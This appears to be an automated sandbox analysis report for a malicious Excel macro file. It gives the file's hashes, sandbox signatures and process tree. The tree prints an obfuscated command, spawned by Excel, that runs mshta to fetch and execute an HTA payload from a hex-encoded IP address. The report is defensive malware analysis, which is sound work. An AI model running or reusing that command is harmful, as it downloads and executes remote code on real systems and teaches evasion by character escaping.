Analysis
- max time kernel: 150s
- max time network: 137s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 19-01-2022 22:06
Behavioral task: behavioral1
- Sample: c3f53e74cbc71cf1956d17dae939c2d9f31a1c2e81328a3ca88ceb1e3bf652c0.xlsm
- Resource: win10-en-20211208
- 0 signatures
- 0 seconds
General
- Target: c3f53e74cbc71cf1956d17dae939c2d9f31a1c2e81328a3ca88ceb1e3bf652c0.xlsm
- Size: 115KB
- MD5: 383a3c7cdb5a9070656164e0b90e41a5
- SHA1: af0b4eedbd1c6d85705c26ebb3955f8b35a8cea8
- SHA256: c3f53e74cbc71cf1956d17dae939c2d9f31a1c2e81328a3ca88ceb1e3bf652c0
- SHA512: c37692e7c9a60fcda701450a620f09c0c95db6e6a1ee3188c2897d09a621d80e3f0fb539506f458ab5c20a7e5adc8adfbe2bcad0860c4bb9484f6292eb391b9c
- Score: 10/10
Malware Config
Extracted
- Language: hta
- Source: URLs
- hta.dropper: http://0x5cff39c3/sec/se1.html
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
- description: Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process; pid: 2180; pid_target: 2744; Process: cmd.exe; procid_target: 67

Blocklisted process makes network request (1 IoC)
- flow: 41; pid: 2988; Process: mshta.exe

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
- Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (Process: EXCEL.EXE)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (Process: EXCEL.EXE)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (Process: EXCEL.EXE)

Enumerates system info in registry (2 TTPs, 3 IoCs)
- Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (Process: EXCEL.EXE)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily (Process: EXCEL.EXE)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (Process: EXCEL.EXE)

Suspicious behavior: AddClipboardFormatListener (1 IoC)
- pid: 2744; Process: EXCEL.EXE

Suspicious use of SetWindowsHookEx (20 IoCs)
- pid: 2744; Process: EXCEL.EXE (this entry is listed 20 times)

Suspicious use of WriteProcessMemory (6 IoCs)
- PID 2744 wrote to memory of 3084; pid: 2744; Process: EXCEL.EXE; procid_target: 69
- PID 2744 wrote to memory of 3084; pid: 2744; Process: EXCEL.EXE; procid_target: 69
- PID 2744 wrote to memory of 2180; pid: 2744; Process: EXCEL.EXE; procid_target: 71
- PID 2744 wrote to memory of 2180; pid: 2744; Process: EXCEL.EXE; procid_target: 71
- PID 2180 wrote to memory of 2988; pid: 2180; Process: cmd.exe; procid_target: 73
- PID 2180 wrote to memory of 2988; pid: 2180; Process: cmd.exe; procid_target: 73
Processes
- C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\c3f53e74cbc71cf1956d17dae939c2d9f31a1c2e81328a3ca88ceb1e3bf652c0.xlsm"
  PID: 2744
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\splwow64.exe
    Command line: C:\Windows\splwow64.exe 12288
    PID: 3084
  - C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html
    PID: 2180
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\mshta.exe
      Command line: mshta http://0x5cff39c3/sec/se1.html
      PID: 2988
      - Blocklisted process makes network request